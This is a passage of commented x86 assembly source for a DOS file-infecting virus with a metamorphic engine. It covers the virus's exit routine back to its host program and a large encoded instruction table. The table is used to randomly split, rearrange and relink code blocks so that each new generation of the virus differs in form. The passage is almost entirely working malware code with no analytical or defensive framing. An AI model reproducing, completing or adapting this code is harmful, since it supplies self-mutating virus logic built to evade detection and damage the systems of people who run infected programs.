; AL = byte of decrypted table call decrypt_byte xchg al,ah ; AL = byte of decrypted table ret ; Return endp virus_exit: pop es ; Load ES from stack mov ah,49h ; Free memory int 21h pop bx ; Load BX from stack pop ax ; Load AX from stack mov ds,ax ; DS = segment of PSP for current ... mov es,ax ; DS = segment of PSP for current ... mov ah,4ah ; Resize memory block int 21h lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32 pop ax ; Load AX from stack (initial IP) mov cs:[bx+01h],ax ; Store initial IP pop ax ; Load AX from stack (initial CS ...) mov cs:[bx+03h],ax ; Store initial CS relative to sta... pop ax ; Load AX from stack (initial SP) pop ss ; Load SS from stack (initial SS ...) mov sp,ax ; SP = stack pointer jmp jmp_imm32 jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah) db 11101010b ; JMP imm32 (opcode 0eah) dd 00h ; Pointer to virus in top of memory ah_ db 00h ; Accumulator register (high-orde...) probability dw 32h ; Probability crypt_key db 00h ; 8-bit encryption/decryption key sliding_key dw 00h ; 8-bit sliding encryption/decrypt... executa_stat db 00h ; Executable status origin_code db 11000011b,02h dup(00h) initial_cs dw 0fff0h ; Initial CS relative to start of ... initial_ss dw 0fff0h ; Initial SS relative to start of ... initial_ip dw 100h ; Initial IP incorrect_ip dw 100h ; Incorrect IP initial_sp dw 0fffeh ; Initial SP new_mcb_size dw 1000h ; New size in paragraphs mcb_size dw 0ffffh ; Size of memory block in paragraphs mcb_size_ dw 00h ; Size of memory block in paragraphs program_seg dw 00h ; Segment of PSP for current process virus_length dw 00h ; Length of virus vir_exit_off dw 00h ; Offset of virus_exit table_begin: first_table: tmc_table db 11101111b ; End of block db 11101110b ; Beginning of block dw 00h ; Block identification of tmc_table db 03h ; Three bytes instruction mov bp,1234h ; BP = delta offset db 01h ; One byte instruction cld ; Clear direction flag db 02h ; Two bytes instruction mov ax,ds ; AX = segment of PSP for current ... db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store segment of PSP for current... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov ds,ax ; DS = segment of current Memory C... db 03h ; Three bytes instruction mov ax,ds:[03h] ; AX = size of memory block in par... db 03h ; Three bytes instruction cmp ax,1900h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store size of memory block in p... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = size of memory block in par... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction sub bx,[bp+1234h] ; Subtract new size in paragraphs ... db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 01h ; One byte instruction dec bx ; BX = number of paragraphs to all... db 04h ; Four bytes instruction cmp bx,0c00h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov es,ax ; ES = segment of allocated memory db 07h ; Seven bytes instruction mov es:[01h],0deadh ; Store 16-bit random number db 07h ; Seven bytes instruction mov word ptr es:[0ch],00h db 07h ; Seven bytes instruction mov es:[04h],1000h ; Store offset of block information db 07h ; Seven bytes instruction mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i... db 07h ; Seven bytes instruction mov es:[08h],3000h ; Store offset of data information db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov bx,4000h ; BX = offset of next virus genera... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc db 11101111b ; End of block initial_tmc_ db 11101110b ; Beginning of block dw 0fa0h ; Block identification of initial_tmc_ db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block tmc_ini_loo db 11101110b ; Beginning of block dw 0bb8h ; Block identification of tmc_ini_... db 02h ; Two bytes instruction add si,ax ; SI = offset of block or instruct... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction or al,al ; End of table? db 01110100b+10000000b ; Zero? Jump to calc_blocks_ dw 0bbch ; Pointer to calc_blocks_ db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_blo__ dw 0bb9h ; Pointer to exam_blo__ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... dw 0bb8h ; Pointer to tmc_ini_loo db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo__ db 11101110b ; Beginning of block dw 0bb9h ; Block identification of exam_blo__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110101b+10000000b ; Not equal? Jump to exam_blo___ dw 0bbah ; Pointer to exam_blo___ db 02h ; Two bytes instruction mov al,00h ; Don't add anything to offset wit... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo___ db 11101110b ; Beginning of block dw 0bbah ; Block identification of exam_blo___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? Jump to next_byte_ dw 0bbbh ; Pointer to next_byte_ db 02h ; Two bytes instruction mov ax,si ; AX = offset of block identification db 01h ; One byte instruction dec ax ; AX = offset of block within table db 01h ; One byte instruction stosw ; Store offset of block within table db 03h ; Three bytes instruction mov ax,0ffffh ; Block is still in one part db 01h ; One byte instruction stosw ; Store block identification db 03h ; Three bytes instruction mov ax,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block next_byte_ db 11101110b ; Beginning of block dw 0bbbh ; Block identification of next_byte_ db 02h ; Two bytes instruction mov al,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block calc_blocks_ db 11101110b ; Beginning of block dw 0bbch ; Block identification of calc_blo... db 03h ; Three bytes instruction lea ax,[di-10h] ; AX = number of blocks multiplied... db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 04h ; Four bytes instruction mov es:[0ah],ax ; Store number of blocks db 02h ; Two bytes instruction xor ax,ax ; End of table db 01h ; One byte instruction stosw ; Store end of table db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc0h ; Pointer to exam_bl db 11101111b ; End of block split_bloc db 11101110b ; Beginning of block dw 0bbdh ; Block identification of split_bloc db 01h ; One byte instruction push bp ; Save BP at stack db 05h ; Five bytes instruction mov bp,es:[0ah] ; BP = number of blocks db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 01h ; One byte instruction pop bp ; Load BP from stack db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 03h ; Three bytes instruction add ax,10h ; Add ten to random number db 02h ; Two bytes instruction mov di,ax ; DI = random offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101111b ; End of block exam_nxt_bl_ db 11101110b ; Beginning of block dw 0bbeh ; Block identification of exam_nxt... db 03h ; Three bytes instruction add di,04h ; DI = offset of next offset withi... db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of next block within... db 02h ; Two bytes instruction or si,si ; End of table? db 01110101b+10000000b ; Not zero? Jump to exam_blo____ dw 0bbfh ; Pointer to exam_blo____ db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbfh ; Pointer to exam_blo____ db 11101111b ; End of block exam_blo____ db 11101110b ; Beginning of block dw 0bbfh ; Block identification of exam_blo... db 01h ; One byte instruction push ax ; Save AX at stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01h ; One byte instruction pop ax ; Load AX from stack db 01110101b+10000000b ; Not equal? Jump to exam_bl dw 0bc0h ; Pointer to exam_bl db 02h ; Two bytes instruction cmp di,ax ; End of table of blocks? db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcah ; Pointer to exam_tbl_in db 11101111b ; End of block exam_bl db 11101110b ; Beginning of block dw 0bc0h ; Block identification of exam_bl db 04h ; Four bytes instruction mov ax,es:[di+02h] ; AX = block information db 03h ; Three bytes instruction cmp ax,0ffffh ; Block is still in one part? db 01110100b+10000000b ; Equal? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,ax ; DI = offset of end of first part... db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 01h ; One byte instruction stosb ; Store JMP imm16 db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 02h ; Two bytes instruction sub ax,di ; Subtract offset of end of first ... db 01h ; One byte instruction stosw ; Store 16-bit immediate db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl_ db 11101110b ; Beginning of block dw 0bc1h ; Block identification of exam_bl_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,10h ; Data; CALL; JMP; Data reference...? db 01110111b+10000000b ; Above? Jump to exam_bl__ dw 0bc2h ; Pointer to exam_bl__ db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push bp ; Save BP at stack db 04h ; Four bytes instruction mov bp,[bp+1234h] ; BP = probability db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 02h ; Two bytes instruction or ax,ax ; Split up block? db 01h ; One byte instruction pop bp ; Load BP from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01110100b+10000000b ; Zero? Jump to split_bloc_ dw 0bc8h ; Pointer to split_bloc_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block exam_bl__ db 11101110b ; Beginning of block dw 0bc2h ; Block identification of exam_bl__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_data_ dw 0bc4h ; Pointer to exam_data_ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? Jump to sto_inst... dw 0bc3h ; Pointer to sto_instruc db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc3h ; Pointer to sto_instruc db 11101111b ; End of block sto_instruc db 11101110b ; Beginning of block dw 0bc3h ; Block identification of sto_inst... db 02h ; Two bytes instruction xor cx,cx ; Zero CX db 02h ; Two bytes instruction mov cl,al ; CL = length of instruction db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0beah ; Pointer to sto_ins_loo db 11101111b ; End of block sto_ins_loo db 11101110b ; Beginning of block dw 0beah ; Block identification of store_op... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction stosb ; Store byte of instruction db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo dw 0beah ; Pointer to sto_ins_loo db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_data_ db 11101110b ; Beginning of block dw 0bc4h ; Block identification of exam_data_ db 02h ; Two bytes instruction cmp al,11101101b ; Data reference? db 01110101b+10000000b ; Not equal? Jump to exam_bl___ dw 0bc5h ; Pointer to exam_bl___ db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[08h] ; DI = offset within data information db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction stosw ; Store offset within next virus g... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[08h],di ; Store offset within data informa... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl___ db 11101110b ; Beginning of block dw 0bc5h ; Block identification of exam_bl___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_ dw 0bc7h ; Pointer to sto_call_jm_ db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[04h] ; DI = offset within block informa... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus ge... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[04h],di ; Store offset within block inform... db 03h ; Three bytes instruction cmp ax,4c5h ; Block identification of tmc_table_? db 01110101b+10000000b ; Not equal? Jump to exam_messag dw 0bc6h ; Pointer to exam_messag db 01h ; One byte instruction push si ; Save SI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 03h ; Three bytes instruction mov cx,(code_end-first_table) db 02h ; Two bytes instruction rep movsb ; Move table to top of memory db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... db 01h ; One byte instruction pop si ; Load SI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_messag db 11101110b ; Beginning of block dw 0bc6h ; Block identification of exam_mes... db 03h ; Three bytes instruction cmp ax,2328h ; Block identification of message? db 01110101b+10000000b ; Not equal? Jump to exam_probab dw 0bedh ; Pointer to exam_probab db 03h ; Three bytes instruction mov ax,14h ; Probability of including message db 04h ; Four bytes instruction cmp [bp+1234h],ax ; Include message? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01110011b+10000000b ; Above or equal? Jump to examine_... dw 0bebh ; Pointer to examine_nex db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction sub al,10h ; AL = length of message db 02h ; Two bytes instruction mov ah,00h ; Zero AH db 02h ; Two bytes instruction add si,ax ; SI = offset of end of message db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_probab db 11101110b ; Beginning of block dw 0bedh ; Block identification of exam_pro... db 03h ; Three bytes instruction cmp ax,0bech ; Block identification of probabi...? db 01110101b+10000000b ; Not equal? Jump to examine_nex dw 0bebh ; Pointer to examine_nex db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = probability_ db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01h ; One byte instruction dec ax ; Decrease probability db 03h ; Three bytes instruction cmp ax,05h ; Probability too small? db 01110011b+10000000b ; Above or equal? Jump to store_pr... dw 0bf5h ; Pointer to store_proba db 03h ; Three bytes instruction mov ax,64h ; Reset probability db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bf5h ; Pointer to store_proba db 11101111b ; End of block store_proba db 11101110b ; Beginning of block dw 0bf5h ; Block identification of store_pr... db 03h ; Three bytes instruction mov es:[bx],ax ; Store probability db 03h ; Three bytes instruction add bx,02h ; Add two to offset within next vi... db 03h ; Three bytes instruction add si,03h ; SI = offset of beginning of next... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block examine_nex db 11101110b ; Beginning of block dw 0bebh ; Block identification of examine_... db 01h ; One byte instruction pop di ; Load DI from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block sto_call_jm_ db 11101110b ; Beginning of block dw 0bc7h ; Block identification of sto_call... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus g... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[06h],di ; Store offset within CALL; JMP; J... db 01h ; One byte instruction pop di ; Load DI from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 03h ; Three bytes instruction mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? db 01110010b+10000000b ; Below? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction inc bx ; Increase offset within next viru... db 01h ; One byte instruction inc bx ; Increase offset within next viru... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block split_bloc_ db 11101110b ; Beginning of block dw 0bc8h ; Block identification of split_bloc_ db 04h ; Four bytes instruction mov es:[di+02h],bx ; Store offset within next virus g... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc9h ; Pointer to end_of_bloc db 11101111b ; End of block end_of_bloc db 11101110b ; Beginning of block dw 0bc9h ; Block identification of end_of_b... db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 03h ; Three bytes instruction mov es:[di],si ; Store offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbdh ; Pointer to split_bloc db 11101111b ; End of block exam_tbl_in db 11101110b ; Beginning of block dw 0bcah ; Block identification of exam_tbl... db 06h ; Six bytes instruction cmp word ptr es:[0ch],00h db 01110101b+10000000b ; End of second table? Jump to cor... dw 0fa1h ; Pointer to correc_i16 db 01h ; One byte instruction pop si ; Load SI from stack db 05h ; Five bytes instruction mov es:[0ch],bx ; Store offset within next virus g... db 04h ; Four bytes instruction add si,(second_table-first_table) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc_ db 11101111b ; End of block correc_i16 db 11101110b ; Beginning of block dw 0fa1h ; Block identification of correc_i16 db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction pop ds ; Load DS from stack (ES) db 04h ; Four bytes instruction sub bx,4000h ; Subtract offset of next virus ge... db 04h ; Four bytes instruction mov ds:[0eh],bx ; Store length of virus db 03h ; Three bytes instruction mov si,2000h ; SI = offset of CALL; JMP; Jcc im... db 04h ; Four bytes instruction mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of CALL; JMP; Jc... db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcbh ; Pointer to jmp_call_lo db 11101111b ; End of block jmp_call_lo db 11101110b ; Beginning of block dw 0bcbh ; Block identification of jmp_call... db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,1000h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block find_block__ db 11101110b ; Beginning of block dw 0bcch ; Block identification of find_blo... db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc dw 0bcdh ; Pointer to found_bloc db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to find_block__ dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block found_bloc db 11101110b ; Beginning of block dw 0bcdh ; Block identification of found_bloc db 02h ; Two bytes instruction mov dx,[si] ; DX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 02h ; Two bytes instruction mov al,[bx] ; AL = first byte of instruction db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? db 01110010b+10000000b ; Below? Jump to sto_call_j dw 0bcfh ; Pointer to sto_call_j db 03h ; Three bytes instruction sub byte ptr [bx],10000000b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 01h ; One byte instruction push dx ; Save DX at stack db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 8-bit immediate db 03h ; Three bytes instruction cmp dx,7fh ; 8-bit immediate out of range? db 01111111b+10000000b ; Greater? Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 03h ; Three bytes instruction cmp dx,0ff80h ; 8-bit immediate out of range? db 01111100b+10000000b ; Less? Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 02h ; Two bytes instruction mov [bx],dl ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of end of Jcc imm8 db 04h ; Four bytes instruction mov [bx],1001000010010000b db 04h ; Four bytes instruction mov byte ptr [bx+02h],10010000b db 01h ; One byte instruction pop dx ; Load DX from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block invert_jcc_ db 11101110b ; Beginning of block dw 0bceh ; Block identification of invert_jcc_ db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction dec bx ; BX = offset of Jcc imm8 db 03h ; Three bytes instruction xor byte ptr [bx],00000001b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 03h ; Three bytes instruction mov byte ptr [bx],03h ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of JMP imm16 db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcfh ; Pointer to sto_call_j db 11101111b ; End of block sto_call_j db 11101110b ; Beginning of block dw 0bcfh ; Block identification of sto_call... db 02h ; Two bytes instruction mov [bx],al ; Store CALL imm16; JMP imm16 db 01h ; One byte instruction inc bx ; BX = offset of 16-bit immediate db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 02h ; Two bytes instruction mov [bx],dx ; Store 16-bit immediate db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block correc_i16_ db 11101110b ; Beginning of block dw 0bd0h ; Block identification of correc_... db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo dw 0bcbh ; Pointer to jmp_call_lo db 03h ; Three bytes instruction mov si,3000h ; SI = offset of data information db 04h ; Four bytes instruction mov cx,ds:[08h] ; CX = offset of end of data infor... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of data informat... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd1h ; Pointer to data_ref_lo db 11101111b ; End of block data_ref_lo db 11101110b ; Beginning of block dw 0bd1h ; Block identification of data_ref_lo db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,1000h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block find_bloc db 11101110b ; Beginning of block dw 0bd2h ; Block identification to find_bloc db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc_ dw 0bd3h ; Pointer to found_bloc_ db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to find_bloc dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block found_bloc_ db 11101110b ; Beginning of block dw 0bd3h ; Block identification of found_bloc_ db 02h ; Two bytes instruction mov ax,[si] ; AX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 03h ; Three bytes instruction sub ax,4000h ; Subtract offset of next virus ge... db 02h ; Two bytes instruction mov [bx],ax ; Store 16-bit immediate db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to data_ref_lo dw 0bd1h ; Pointer to data_ref_lo db 11101001b ; JMP imm16 (opcode 0e9h) dw 1772h ; Pointer to restore_cod db 11101111b ; End of block restore_cod db 11101110b ; Beginning of block dw 1772h ; Block identification of restore_... db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = segment of PSP for current ... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial SS relative to star... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial SS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial SP at stack db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial CS relative to star... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial CS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial IP at stack db 11101101b ; Data reference dw 138bh ; Pointer to initial_ip_ db 01h ; One byte instruction push ax ; Save segment of PSP for current 